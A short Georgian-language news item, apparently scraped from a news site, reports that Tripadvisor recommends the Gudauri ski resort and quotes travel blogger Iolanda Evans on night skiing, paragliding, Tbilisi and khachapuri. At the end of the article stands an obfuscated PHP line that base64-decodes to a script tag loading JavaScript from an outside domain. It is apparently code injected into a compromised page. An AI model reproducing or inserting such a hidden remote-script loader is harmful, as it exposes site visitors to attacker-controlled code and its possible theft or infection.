celsiusi
ავერსი საქკაბელი

გავლენიანი სამოგზაურო პლატფორმა Tripadvisor-ი მომხმარებელს საქართველოში მოგზაურობას და გუდაურში სრიალს ურჩევს.

სტატიაში „ევროპის 5 შეუფასებელი სამთო კურორტი, რომელსაც ამ ზამთარს უნდა ეწვიოთ“, საქართველოსთან ერთად, რუმინეთის, ბულგარეთის, ესპანეთისა და ანდორას ზამთრის კურორტები მოხვდა.

სტატიის ავტორმა, ცნობილმა მწერალმა და ბლოგერმა, იოლანდა ევანსმა საქართველოში ტურიზმის ეროვნული ადმინისტრაციის პრესტურის ფარგლებში იმოგზაურა.

„გუდაური თბილისიდან სულ რაღაც ორი საათის სავალზეა. გუდაური ბიუჯეტური კურორტია, თუ გამოცდილი მოთხილამურე ხართ, არ გამოტოვოთ ღამის სრიალი. პარაპლანი უმაღლესი სათავგადასავლო ტურია, დიახ, აქ ზამთარშიც შეიძლება გაფრენა. აუცილებლად დაიტოვეთ დრო თბილისისთვის, ან სრიალამდე, ან სრიალის შემდეგ და ეწვიეთ ძველ ქალაქს“,- წერს იოლანდა ევანსი.

იოლანდა ევანსი აღწერს გუდაურის კვების ობიექტებს, მკითხველს ურჩევს, დააგემოვნოს ხაჭაპური, ჯიპტურით მოიარონ გერგეტის სამება, ანანურის ციხე და სხვა ისტორიული ადგილები.

64
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");